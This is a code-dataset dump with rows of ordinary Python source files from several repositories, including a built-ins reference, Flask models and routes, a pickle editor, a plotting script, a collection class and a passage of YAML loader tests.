repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
madoodia/codeLab | python/Built-in_Functions.py | 1 | 15493 | ######################################### Built-in Functions #########################################
abs(x) # Return the absolute value of a number
# .........................................
all(iterable) # Return True if all elements of the iterable are true
# equivalent to:
def all(iterable):
for element in iterable:
if not element:
return False
return True
# .........................................
any(iterable) # Return True if any element of the iterable is true
def any(iterable):
for element in iterable:
if element:
return True
return False
# .........................................
basestring() # This abstract type is the superclass for str and unicode
obj = 'hello'
isinstance(obj, basestring) # Return True
# .........................................
bin(x) # Convert an integer number to a binary string
# .........................................
bool([x]) # Convert a value to a Boolean, using the standard truth testing procedure
# .........................................
bytearray([source[, encoding[, errors]]]) # Return a new array of bytes
# .........................................
callable(object) # Return True if the object argument appears callable, False if not
def test():
pass
callable(test) # Return True
class A:
pass
a = A()
callable(A) # Return True
callable(a) # Return False
class B:
def __call__(self):
pass
b = B()
callable(B) # Return True
callable(b) # Return True
# .........................................
chr(i) # Return a string of one character whose ASCII code is the integer i
# .........................................
classmethod(function) # Return a class method for function.
class C(object):
@classmethod
def f(cls, arg1, arg2, ...):
...
# The @classmethod form is a function decorator
# It can be called either on the class (such as C.f()) or on an instance (such as C().f()).
# The instance is ignored except for its class. If a class method is called for a derived class, the derived class object is passed as the implied first argument.
# .........................................
cmp(x, y) # Compare the two objects x and y and return an integer according to the outcome
# .........................................
compile(source, filename, mode[, flags[, dont_inherit]]) # Compile the source into a code or AST object
# .........................................
complex([real[, imag]]) # Create a complex number with the value real + imag*j or convert a string or number to a complex number
# .........................................
delattr(object, name) # This is a relative of setattr(). The arguments are an object and a string
# .........................................
dict(**kwarg)
dict(mapping, **kwarg)
dict(iterable, **kwarg) # Create a new dictionary. The dict object is the dictionary class
# .........................................
dir([object]) # Without arguments, return the list of names in the current local scope
class Shape(object):
def __dir__(self):
return ['area', 'perimeter', 'location']
s = Shape()
dir(s) # ['area', 'perimeter', 'location']
# .........................................
divmod(a, b) # Take two (non complex) numbers as arguments and return a pair of numbers consisting of their quotient and remainder when using long division
# .........................................
enumerate(sequence, start=0) # Return an enumerate object. sequence must be a sequence, an iterator, or some other object which supports iteration
seasons = ['Spring', 'Summer', 'Fall', 'Winter']
list(enumerate(seasons)) # [(0, 'Spring'), (1, 'Summer'), (2, 'Fall'), (3, 'Winter')]
list(enumerate(seasons, start=1)) # [(1, 'Spring'), (2, 'Summer'), (3, 'Fall'), (4, 'Winter')]
# Equivalent to:
def enumerate(sequence, start=0):
n = start
for elem in sequence:
yield n, elem
n += 1
# .........................................
eval(expression[, globals[, locals]]) # The arguments are a Unicode or Latin-1 encoded string and optional globals and locals. If provided, globals must be a dictionary. If provided, locals can be any mapping object.
# .........................................
execfile(filename[, globals[, locals]]) # This function is similar to the exec statement, but parses a file instead of a string
# .........................................
file(name[, mode[, buffering]]) # Constructor function for the file type, described further in section File Objects
isinstance(f, file)
# .........................................
filter(function, iterable) # Construct a list from those elements of iterable for which function returns true
# Note that filter(function, iterable) is equivalent to [item for item in iterable if function(item)]
# .........................................
float([x]) # Convert a string or a number to floating point
# .........................................
format(value[, format_spec]) # Convert a value to a “formatted” representation, as controlled by format_spec
# .........................................
frozenset([iterable]) # Return a new frozenset object, optionally with elements taken from iterable
# .........................................
getattr(object, name[, default]) # Return the value of the named attribute of object
# .........................................
globals() # Return a dictionary representing the current global symbol table
# .........................................
hasattr(object, name) # The arguments are an object and a string
# .........................................
hash(object) # Return the hash value of the object (if it has one). Hash values are integers
# .........................................
help([object]) # Invoke the built-in help system
# .........................................
hex(x) # Convert an integer number (of any size) to a hexadecimal string
# .........................................
id(object) # Return the “identity” of an object
# .........................................
input([prompt]) # Equivalent to eval(raw_input(prompt)).
# .........................................
int(x=0)
int(x, base=10) # Convert a number or string x to an integer, or return 0 if no arguments are given
# .........................................
isinstance(object, classinfo) # Return true if the object argument is an instance of the classinfo argument
# .........................................
issubclass(class, classinfo) # Return true if class is a subclass (direct, indirect or virtual) of classinfo
# .........................................
iter(o[, sentinel]) # Return an iterator object
with open('mydata.txt') as fp:
for line in iter(fp.readline, ''):
process_line(line)
# .........................................
len(s) # Return the length (the number of items) of an object
# .........................................
list([iterable]) # Return a list whose items are the same and in the same order as iterable‘s items
# .........................................
locals() # Update and return a dictionary representing the current local symbol table
# .........................................
long(x=0)
long(x, base=10) # Convert a string or number to a long integer.
# .........................................
map(function, iterable, ...) # Apply function to every item of iterable and return a list of the results
def adder(a, b):
return a + b
numbers1 = [2, 4, 6, 8, 1, 10, 8, 9]
numbers2 = [4, 6, 8, 1, 10, 8, 9, 1]
mapper = map(adder, numbers1, numbers2) # Result: [6, 10, 14, 9, 11, 18, 17, 10] #
# .........................................
max(iterable[, key])
max(arg1, arg2, *args[, key]) # Return the largest item in an iterable or the largest of two or more arguments.
# .........................................
memoryview(obj) # Return a “memory view” object created from the given argument
# .........................................
min(iterable[, key])
min(arg1, arg2, *args[, key]) # Return the smallest item in an iterable or the smallest of two or more arguments.
# .........................................
next(iterator[, default]) # Retrieve the next item from the iterator by calling its next() method
# .........................................
object() # Return a new featureless object
# .........................................
oct(x) # Convert an integer number (of any size) to an octal string
# .........................................
open(name[, mode[, buffering]]) # Open a file, returning an object of the file type described in section File Objects. If the file cannot be opened, IOError is raised
# .........................................
ord(c) # Given a string of length one, return an integer representing the Unicode code point of the character when the argument is a unicode object
# .........................................
pow(x, y[, z]) # Return x to the power y # pow(x, y) is equivalent to using the power operator: x**y
# To disable the statement and use the print() function, use this future statement at the top of your module:
from __future__ import print_function
# .........................................
property([fget[, fset[, fdel[, doc]]]]) # Return a property attribute for new-style classes (classes that derive from object).
class C(object):
def __init__(self):
self._x = None
def getx(self):
return self._x
def setx(self, value):
self._x = value
def delx(self):
del self._x
x = property(getx, setx, delx, "I'm the 'x' property.")
# If then c is an instance of C, c.x will invoke the getter, c.x = value will invoke the setter and del c.x the deleter.
class Parrot(object):
def __init__(self):
self._voltage = 100000
@property
def voltage(self):
"""Get the current voltage."""
return self._voltage
# turns the voltage() method into a “getter” for a read-only attribute with the same name
class C(object):
def __init__(self):
self._x = None
@property
def x(self):
"""I'm the 'x' property."""
return self._x
@x.setter
def x(self, value):
self._x = value
@x.deleter
def x(self):
del self._x
# .........................................
range(stop)
range(start, stop[, step]) # This is a versatile function to create lists containing arithmetic progressions
range(10)
range(1, 11)
range(0, 30, 5)
range(0, 10, 3)
range(0, -10, -1)
range(0)
range(1, 0)
# .........................................
raw_input([prompt]) # If the prompt argument is present, it is written to standard output without a trailing newline
s = raw_input('--> ')
# -->
# .........................................
reduce(function, iterable[, initializer]) # Apply function of two arguments cumulatively to the items of iterable, from left to right, so as to reduce the iterable to a single value
def reduce(function, iterable, initializer=None):
it = iter(iterable)
if initializer is None:
try:
initializer = next(it)
except StopIteration:
raise TypeError('reduce() of empty sequence with no initial value')
accum_value = initializer
for x in it:
accum_value = function(accum_value, x)
return accum_value
# .........................................
reload(module) # Reload a previously imported module
# .........................................
repr(object) # Return a string containing a printable representation of an object. This is the same value yielded by conversions
# A class can control what this function returns for its instances by defining a __repr__() method.
# .........................................
reversed(seq) # Return a reverse iterator.
# .........................................
round(number[, ndigits]) # Return the floating point value number rounded to ndigits digits after the decimal point
# .........................................
set([iterable]) # Return a new set object, optionally with elements taken from iterable
# .........................................
setattr(object, name, value) # This is the counterpart of getattr(). The arguments are an object, a string and an arbitrary value
# For example, setattr(x, 'foobar', 123) is equivalent to x.foobar = 123.
# .........................................
slice(stop)
slice(start, stop[, step]) # Return a slice object representing the set of indices specified by range(start, stop, step)
# .........................................
sorted(iterable[, cmp[, key[, reverse]]]) # Return a new sorted list from the items in iterable.
cmp=lambda x,y: cmp(x.lower(), y.lower())
# .........................................
staticmethod(function) # Return a static method for function.
class C(object):
@staticmethod
def f(arg1, arg2, ...):
...
# It can be called either on the class (such as C.f()) or on an instance (such as C().f()).
# .........................................
str(object='') # Return a string containing a nicely printable representation of an object.
# .........................................
sum(iterable[, start]) # Sums start and the items of an iterable from left to right and returns the total
# .........................................
super(type[, object-or-type]) # Return a proxy object that delegates method calls to a parent or sibling class of type
# Note: super() only works for new-style classes.
class C(B):
def method(self, arg):
super(C, self).method(arg)
# .........................................
tuple([iterable]) # Return a tuple whose items are the same and in the same order as iterable‘s items
# .........................................
type(object) # With one argument, return the type of an object. The return value is a type object
type(name, bases, dict) # With three arguments, return a new type object # This is essentially a dynamic form of the class statement.
class X(object):
a = 1
X = type('X', (object,), dict(a=1))
# .........................................
unichr(i) # Return the Unicode string of one character whose Unicode code is the integer i
# .........................................
unicode(object='')
unicode(object[, encoding[, errors]]) # Return the Unicode string version of object
# .........................................
vars([object]) # Return the __dict__ attribute for a module, class, instance, or any other object with a __dict__ attribute.
# Without an argument, vars() acts like locals().
# .........................................
xrange(stop)
xrange(start, stop[, step]) # This function is very similar to range(), but returns an xrange object instead of a list
# .........................................
zip([iterable, ...]) # This function returns a list of tuples, where the i-th tuple contains the i-th element from each of the argument sequences or iterables
# zip() is similar to map() with an initial argument of None
x = [1, 2, 3]
y = [4, 5, 6]
zipped = zip(x, y)
zipped # [(1, 4), (2, 5), (3, 6)]
x2, y2 = zip(*zipped)
x == list(x2) and y == list(y2) # True
# .........................................
__import__(name[, globals[, locals[, fromlist[, level]]]])
# Note: This is an advanced function that is not needed in everyday Python programming
# This function is invoked by the import statement
# .........................................
# .........................................
# .........................................
| mit | 4,427,158,441,983,250,000 | 46.904025 | 217 | 0.545208 | false |
pmrowla/goonbcs | goonbcs/models.py | 1 | 3450 | # Copyright (c) 2013 Peter Rowlands
from __future__ import absolute_import
from flask.ext.security import UserMixin, RoleMixin
from . import db
class Conference(db.Model):
"""A college football conference"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255), unique=True)
subdivision_id = db.Column(db.Integer, db.ForeignKey('subdivision.id'))
teams = db.relationship('Team', backref='conference', lazy='dynamic')
divisions = db.relationship('Division', backref='conference',
lazy='dynamic')
class Division(db.Model):
"""A conference division (i.e. the SEC East)"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255), unique=True)
conference_id = db.Column(db.Integer, db.ForeignKey('conference.id'))
teams = db.relationship('Team', backref='division', lazy='dynamic')
class Poll(db.Model):
"""A single user's poll for a single week"""
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
week_id = db.Column(db.Integer, db.ForeignKey('week.id'))
moon_poll = db.Column(db.Boolean, default=False)
votes = db.relationship('Vote', backref='poll', lazy='dynamic')
class Season(db.Model):
id = db.Column(db.Integer, primary_key=True)
year = db.Column(db.Integer, unique=True)
weeks = db.relationship('Week', backref='season', lazy='dynamic')
class Subdivision(db.Model):
"""A college football subdivision (i.e. FBS)"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255))
conferences = db.relationship('Conference', backref='subdivision',
lazy='dynamic')
class Team(db.Model):
"""A college football team"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255))
school = db.Column(db.String(255), unique=True)
conference_id = db.Column(db.Integer, db.ForeignKey('conference.id'))
division_id = db.Column(db.Integer, db.ForeignKey('division.id'))
class Vote(db.Model):
id = db.Column(db.Integer, primary_key=True)
poll_id = db.Column(db.Integer, db.ForeignKey('poll.id'))
team_id = db.Column(db.Integer, db.ForeignKey('team.id'))
rank = db.Column(db.Integer)
db.UniqueConstraint('poll_id', 'team_id', name='uidx_poll_team')
class Week(db.Model):
id = db.Column(db.Integer, primary_key=True)
num = db.Column(db.Integer)
season_id = db.Column(db.Integer, db.ForeignKey('season.id'))
#######################
# Flask-security models
#######################
roles_users = db.Table(
'roles_users',
db.Column('user_id', db.Integer(), db.ForeignKey('user.id')),
db.Column('role_id', db.Integer(), db.ForeignKey('role.id')))
class Role(db.Model, RoleMixin):
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(80), unique=True)
description = db.Column(db.String(255))
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(255), unique=True)
password = db.Column(db.String(255))
active = db.Column(db.Boolean())
confirmed_at = db.Column(db.DateTime())
roles = db.relationship('Role', secondary=roles_users,
backref=db.backref('users', lazy='dynamic'))
polls = db.relationship('Poll', backref='user', lazy='dynamic')
| mit | -7,676,578,578,878,434,000 | 33.848485 | 75 | 0.648406 | false |
charany1/googlecl | src/debug_util.py | 2 | 2144 | # Copyright (C) 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities that should not be distributed with source."""
__author__ = '[email protected] (Tom Miller)'
import atom
import inspect
dull_types = [str, unicode, dict, list, type(None)]
def walk_attributes(myobject, object_name, tabitem='=', step=True, tablevel=0):
"""Walk through attributes of an instance.
Just flat out prints varying values of dir() for instances and their
attributes.
Args:
myobject: instance to walk through
object_name: Name of the instance being walked through
tabitem: String to show depth into myobject. Set to '' to disable.
step: bool Use raw_input('') after printing each attribute
tablevel: Depth into myobject (starts at 0)
Returns:
NATHING!
"""
print tabitem*tablevel + 'Object: ' + object_name
print tabitem*tablevel + 'Type: ' + str(type(myobject))
attr_list = [attr for attr in dir(myobject)
if not attr.startswith('_') and
not inspect.ismethod(getattr(myobject, attr))]
print tabitem*tablevel + 'Attributes: '
print tabitem*tablevel + str(attr_list)
dull_attr = [attr for attr in attr_list
if type(getattr(myobject, attr)) in dull_types]
if dull_attr:
print tabitem*tablevel + '(basic attributes: ' + str(dull_attr) + ')'
loopable_attr = [attr for attr in attr_list
if not type(getattr(myobject, attr)) in dull_types]
for attr_name in loopable_attr:
new_object = getattr(myobject, attr_name)
if step:
raw_input('')
walk_attributes(new_object, attr_name, tablevel=tablevel+1)
| mit | 1,641,560,307,784,319,000 | 34.733333 | 79 | 0.695429 | false |
heromod/migrid | mig/edpickle.py | 1 | 2501 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# edpickle - a simple pickled object editor.
# Copyright (C) 2009 Jonas Bardino
#
# This file is part of MiG.
#
# MiG is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# MiG is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""Edit pickled objects on disk"""
import os
import sys
from shared.serial import pickle
if len(sys.argv) < 2:
print 'Usage: %s PATH' % sys.argv[0]
print 'Edit pickled object in file PATH'
sys.exit(1)
dirty = False
path = sys.argv[1]
print "opening pickle in %s" % path
pickle_fd = open(path, 'rb+')
obj = pickle.load(pickle_fd)
print "pickled object loaded as 'obj'"
while True:
command = raw_input("Enter command: ")
command = command.lower().strip()
if command in ['o', 'open']:
path = raw_input("Path to open: ")
pickle_fd = open(path, 'rb+')
obj = pickle.load(pickle_fd)
elif command in ['h', 'help']:
print "Valid commands include:"
print "(d)isplay to display the opened pickled object"
print "(e)dit to edit the opened pickled object"
print "(o)pen to open a new pickle file"
print "(c)lose to close the opened pickled object"
print "(q)uit to quit pickle editor"
elif command in ['d', 'display']:
print obj
elif command in ['e', 'edit']:
edit = raw_input("Edit command: ")
#eval(edit)
eval(compile(edit, 'command-line', 'single'))
dirty = True
elif command in ['c', 'close', 'q', 'quit']:
if dirty:
flush = raw_input("Modified object not saved - save now?: ")
if flush.lower() in ('y', 'yes'):
pickle_fd.seek(0)
pickle.dump(obj, pickle_fd)
pickle_fd.close()
obj = None
if command in ('q', 'quit'):
print "Closing"
break
else:
print "unknown command '%s'" % command
| gpl-2.0 | -489,058,328,799,537,700 | 32.346667 | 81 | 0.628149 | false |
NewAcropolis/api | app/routes/venues/rest.py | 1 | 3126 | import os
from flask import (
Blueprint,
current_app,
jsonify,
request
)
from flask_jwt_extended import jwt_required
from app.dao.venues_dao import (
dao_create_venue,
dao_get_venues,
dao_update_venue,
dao_get_venue_by_id
)
from app.errors import register_errors
from app.routes.venues.schemas import (
post_create_venue_schema,
post_create_venues_schema,
post_import_venues_schema,
post_update_venue_schema
)
from app.models import Venue
from app.schema_validation import validate
venues_blueprint = Blueprint('venues', __name__)
venue_blueprint = Blueprint('venue', __name__)
register_errors(venues_blueprint)
register_errors(venue_blueprint)
@venues_blueprint.route('/venues')
@jwt_required
def get_venues():
venues = [e.serialize() if e else None for e in dao_get_venues()]
return jsonify(venues)
@venue_blueprint.route('/venue/<uuid:venue_id>', methods=['GET'])
def get_venue_by_id(venue_id):
current_app.logger.info('get_venue: {}'.format(venue_id))
venue = dao_get_venue_by_id(venue_id)
return jsonify(venue.serialize())
@venue_blueprint.route('/venue', methods=['POST'])
def create_venue():
data = request.get_json(force=True)
validate(data, post_create_venue_schema)
venue = Venue(**data)
dao_create_venue(venue)
return jsonify(venue.serialize()), 201
@venues_blueprint.route('/venues', methods=['POST'])
@jwt_required
def create_venues():
data = request.get_json(force=True)
validate(data, post_create_venues_schema)
venues = []
for item in data:
venue = Venue.query.filter(Venue.name == item['name']).first()
if not venue:
venue = Venue(**item)
venues.append(venue)
dao_create_venue(venue)
else:
current_app.logger.info('venue already exists: {}'.format(venue.name))
return jsonify([v.serialize() for v in venues]), 201
@venues_blueprint.route('/venues/import', methods=['POST'])
@jwt_required
def import_venues():
data = request.get_json(force=True)
validate(data, post_import_venues_schema)
venues = []
for item in data:
if not item["name"]:
item["name"] = "Head branch"
venue = Venue.query.filter(Venue.old_id == item['id']).first()
if not venue:
venue = Venue(
old_id=item['id'],
name=item['name'],
address=item['address'],
directions="<div>Bus: {bus}</div><div>Train: {train}</div>".format(bus=item['bus'], train=item['tube'])
)
venues.append(venue)
dao_create_venue(venue)
else:
current_app.logger.info('venue already exists: {}'.format(venue.name))
return jsonify([v.serialize() for v in venues]), 201
@venue_blueprint.route('/venue/<uuid:venue_id>', methods=['POST'])
def update_venue(venue_id):
data = request.get_json()
validate(data, post_update_venue_schema)
fetched_venue = dao_get_venue_by_id(venue_id)
dao_update_venue(venue_id, **data)
return jsonify(fetched_venue.serialize()), 200
| mit | 2,526,085,522,634,169,000 | 25.948276 | 119 | 0.636916 | false |
ifcharming/voltdb2.1 | tools/vis.py | 1 | 5697 | #!/usr/bin/env python
# This is a visualizer which pulls TPC-C benchmark results from the MySQL
# databases and visualizes them. Four graphs will be generated, latency graph on
# sinigle node and multiple nodes, and throughput graph on single node and
# multiple nodes.
#
# Run it without any arguments to see what arguments are needed.
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))) +
os.sep + 'tests/scripts/')
import time
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from voltdbclient import *
STATS_SERVER = 'volt2'
def COLORS(k):
return (((k ** 3) % 255) / 255.0,
((k * 100) % 255) / 255.0,
((k * k) % 255) / 255.0)
MARKERS = ['+', '*', '<', '>', '^', '_',
'D', 'H', 'd', 'h', 'o', 'p']
def get_stats(hostname, port, days):
"""Get statistics of all runs
Example return value:
{ u'VoltKV': [ { 'lat95': 21,
'lat99': 35,
'nodes': 1,
'throughput': 104805,
'date': datetime object}],
u'Voter': [ { 'lat95': 20,
'lat99': 47,
'nodes': 1,
'throughput': 66287,
'date': datetime object}]}
"""
conn = FastSerializer(hostname, port)
proc = VoltProcedure(conn, 'BestOfPeriod',
[FastSerializer.VOLTTYPE_SMALLINT])
resp = proc.call([days])
conn.close()
# keyed on app name, value is a list of runs sorted chronologically
stats = dict()
run_stat_keys = ['nodes', 'date', 'tps', 'lat95', 'lat99']
for row in resp.tables[0].tuples:
app_stats = []
if row[0] not in stats:
stats[row[0]] = app_stats
else:
app_stats = stats[row[0]]
run_stats = dict(zip(run_stat_keys, row[1:]))
app_stats.append(run_stats)
# sort each one
for app_stats in stats.itervalues():
app_stats.sort(key=lambda x: x['date'])
return stats
class Plot:
DPI = 100.0
def __init__(self, title, xlabel, ylabel, filename, w, h):
self.filename = filename
self.legends = {}
w = w == None and 800 or w
h = h == None and 300 or h
fig = plt.figure(figsize=(w / self.DPI, h / self.DPI),
dpi=self.DPI)
self.ax = fig.add_subplot(111)
self.ax.set_title(title)
plt.xticks(fontsize=10)
plt.yticks(fontsize=10)
plt.ylabel(ylabel, fontsize=8)
plt.xlabel(xlabel, fontsize=8)
fig.autofmt_xdate()
def plot(self, x, y, color, marker_shape, legend):
self.ax.plot(x, y, linestyle="-", label=str(legend),
marker=marker_shape, markerfacecolor=color, markersize=4)
def close(self):
formatter = matplotlib.dates.DateFormatter("%b %d")
self.ax.xaxis.set_major_formatter(formatter)
plt.legend(prop={'size': 10}, loc=0)
plt.savefig(self.filename, format="png", transparent=False,
bbox_inches="tight", pad_inches=0.2)
def plot(title, xlabel, ylabel, filename, nodes, width, height, data,
data_type):
plot_data = dict()
for app, runs in data.iteritems():
for v in runs:
if v['nodes'] != nodes:
continue
if app not in plot_data:
plot_data[app] = {'time': [], data_type: []}
datenum = matplotlib.dates.date2num(v['date'])
plot_data[app]['time'].append(datenum)
if data_type == 'tps':
value = v['tps']/v['nodes']
else:
value = v[data_type]
plot_data[app][data_type].append(value)
if len(plot_data) == 0:
return
i = 0
pl = Plot(title, xlabel, ylabel, filename, width, height)
sorted_data = sorted(plot_data.items(), key=lambda x: x[0])
for k, v in sorted_data:
pl.plot(v['time'], v[data_type], COLORS(i), MARKERS[i], k)
i += 3
pl.close()
def usage():
print "Usage:"
print "\t", sys.argv[0], "output_dir filename_base" \
" [width] [height]"
print
print "\t", "width in pixels"
print "\t", "height in pixels"
def main():
if len(sys.argv) < 3:
usage()
exit(-1)
if not os.path.exists(sys.argv[1]):
print sys.argv[2], "does not exist"
exit(-1)
path = os.path.join(sys.argv[1], sys.argv[2])
width = None
height = None
if len(sys.argv) >= 4:
width = int(sys.argv[3])
if len(sys.argv) >= 5:
height = int(sys.argv[4])
stats = get_stats(STATS_SERVER, 21212, 30)
# Plot single node stats for all apps
plot("Average Latency on Single Node", "Time", "Latency (ms)",
path + "-latency-single.png", 1, width, height, stats, 'lat99')
plot("Single Node Performance", "Time", "Throughput (txns/sec)",
path + "-throughput-single.png", 1, width, height, stats, 'tps')
# Plot 3 node stats for all apps
plot("Average Latency on 3 Nodes", "Time", "Latency (ms)",
path + "-latency-3.png", 3, width, height, stats, 'lat99')
plot("3 Node Performance", "Time", "Throughput (txns/sec)",
path + "-throughput-3.png", 3, width, height, stats, 'tps')
# Plot 6 node stats for all apps
plot("Average Latency on 6 Node", "Time", "Latency (ms)",
path + "-latency-6.png", 6, width, height, stats, 'lat99')
plot("6 Node Performance", "Time", "Throughput (txns/sec)",
path + "-throughput-6.png", 6, width, height, stats, 'tps')
if __name__ == "__main__":
main()
| gpl-3.0 | 7,035,395,335,418,342,000 | 30.131148 | 80 | 0.552923 | false |
klahnakoski/jx-sqlite | vendor/mo_collections/unique_index.py | 1 | 5570 | # encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Contact: Kyle Lahnakoski ([email protected])
#
from __future__ import absolute_import, division, unicode_literals
from mo_dots import is_data, is_sequence, tuplewrap, unwrap, wrap
from mo_dots.objects import datawrap
from mo_future import PY2, iteritems, Set, Mapping, Iterable
from mo_logs import Log
from mo_logs.exceptions import suppress_exception
DEBUG = False
class UniqueIndex(Set, Mapping):
"""
DEFINE A SET OF ATTRIBUTES THAT UNIQUELY IDENTIFIES EACH OBJECT IN A list.
THIS ALLOWS set-LIKE COMPARISIONS (UNION, INTERSECTION, DIFFERENCE, ETC) WHILE
STILL MAINTAINING list-LIKE FEATURES
KEYS CAN BE DOT-DELIMITED PATHS TO DEEP INNER OBJECTS
"""
def __init__(self, keys, data=None, fail_on_dup=True):
self._data = {}
self._keys = tuplewrap(keys)
self.count = 0
self.fail_on_dup = fail_on_dup
if data:
for d in data:
self.add(d)
def __getitem__(self, key):
try:
_key = value2key(self._keys, key)
if len(self._keys) == 1 or len(_key) == len(self._keys):
d = self._data.get(_key)
return wrap(d)
else:
output = wrap([
d
for d in self._data.values()
if all(wrap(d)[k] == v for k, v in _key.items())
])
return output
except Exception as e:
Log.error("something went wrong", e)
def __setitem__(self, key, value):
Log.error("Use add() to ad to an index")
# try:
# key = value2key(self._keys, key)
# d = self._data.get(key)
# if d != None:
# Log.error("key already filled")
# self._data[key] = unwrap(value)
# self.count += 1
#
# except Exception as e:
# Log.error("something went wrong", e)
def keys(self):
return self._data.keys()
def pop(self):
output = iteritems(self._data).next()[1]
self.remove(output)
return wrap(output)
def add(self, val):
val = datawrap(val)
key = value2key(self._keys, val)
if key == None:
Log.error("Expecting key to be not None")
try:
d = self._data.get(key)
except Exception as e:
key = value2key(self._keys, val)
if d is None:
self._data[key] = unwrap(val)
self.count += 1
elif d is not val:
if self.fail_on_dup:
Log.error("{{new|json}} with key {{key|json}} already filled with {{old|json}}", key=key, new=val, old=self[val])
elif DEBUG:
Log.warning("key {{key|json}} already filled\nExisting\n{{existing|json|indent}}\nValue\n{{value|json|indent}}",
key=key,
existing=d,
value=val
)
def extend(self, values):
for v in values:
self.add(v)
def remove(self, val):
key = value2key(self._keys, datawrap(val))
if key == None:
Log.error("Expecting key to not be None")
d = self._data.get(key)
if d is None:
# ALREADY GONE
return
else:
del self._data[key]
self.count -= 1
def __contains__(self, key):
return self[key] != None
if PY2:
def __iter__(self):
return (wrap(v) for v in self._data.itervalues())
else:
def __iter__(self):
return (wrap(v) for v in self._data.values())
def __sub__(self, other):
output = UniqueIndex(self._keys, fail_on_dup=self.fail_on_dup)
for v in self:
if v not in other:
output.add(v)
return output
def __and__(self, other):
output = UniqueIndex(self._keys)
for v in self:
if v in other:
output.add(v)
return output
def __or__(self, other):
output = UniqueIndex(self._keys)
for v in self:
output.add(v)
for v in other:
with suppress_exception:
output.add(v)
return output
def __ior__(self, other):
for v in other:
with suppress_exception:
self.add(v)
return self
def __xor__(self, other):
if not isinstance(other, Iterable):
Log.error("Expecting other to be iterable")
other = UniqueIndex(keys=self._keys, data=other, fail_on_dup=False)
return (self-other) | (other-self)
def __len__(self):
if self.count == 0:
for d in self:
self.count += 1
return self.count
def subtract(self, other):
return self.__sub__(other)
def intersect(self, other):
return self.__and__(other)
def value2key(keys, val):
if len(keys) == 1:
if is_data(val):
return val[keys[0]]
elif is_sequence(val):
return val[0]
else:
return val
else:
if is_data(val):
return datawrap({k: val[k] for k in keys})
elif is_sequence(val):
return datawrap(dict(zip(keys, val)))
else:
Log.error("do not know what to do here")
| mpl-2.0 | -1,573,903,108,648,493,300 | 28.315789 | 129 | 0.523878 | false |
jamespcole/home-assistant | tests/util/test_yaml.py | 1 | 17357 | """Test Home Assistant yaml loader."""
import io
import os
import unittest
import logging
from unittest.mock import patch
import pytest
from homeassistant.exceptions import HomeAssistantError
from homeassistant.util import yaml
from homeassistant.config import YAML_CONFIG_FILE, load_yaml_config_file
from tests.common import get_test_config_dir, patch_yaml_files
@pytest.fixture(autouse=True)
def mock_credstash():
"""Mock credstash so it doesn't connect to the internet."""
with patch.object(yaml, 'credstash') as mock_credstash:
mock_credstash.getSecret.return_value = None
yield mock_credstash
class TestYaml(unittest.TestCase):
"""Test util.yaml loader."""
# pylint: disable=no-self-use, invalid-name
def test_simple_list(self):
"""Test simple list."""
conf = "config:\n - simple\n - list"
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert doc['config'] == ["simple", "list"]
def test_simple_dict(self):
"""Test simple dict."""
conf = "key: value"
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert doc['key'] == 'value'
def test_unhashable_key(self):
"""Test an unhasable key."""
files = {YAML_CONFIG_FILE: 'message:\n {{ states.state }}'}
with pytest.raises(HomeAssistantError), \
patch_yaml_files(files):
load_yaml_config_file(YAML_CONFIG_FILE)
def test_no_key(self):
"""Test item without a key."""
files = {YAML_CONFIG_FILE: 'a: a\nnokeyhere'}
with pytest.raises(HomeAssistantError), \
patch_yaml_files(files):
yaml.load_yaml(YAML_CONFIG_FILE)
def test_environment_variable(self):
"""Test config file with environment variable."""
os.environ["PASSWORD"] = "secret_password"
conf = "password: !env_var PASSWORD"
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert doc['password'] == "secret_password"
del os.environ["PASSWORD"]
def test_environment_variable_default(self):
"""Test config file with default value for environment variable."""
conf = "password: !env_var PASSWORD secret_password"
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert doc['password'] == "secret_password"
def test_invalid_environment_variable(self):
"""Test config file with no environment variable sat."""
conf = "password: !env_var PASSWORD"
with pytest.raises(HomeAssistantError):
with io.StringIO(conf) as file:
yaml.yaml.safe_load(file)
def test_include_yaml(self):
"""Test include yaml."""
with patch_yaml_files({'test.yaml': 'value'}):
conf = 'key: !include test.yaml'
with io.StringIO(conf) as file:
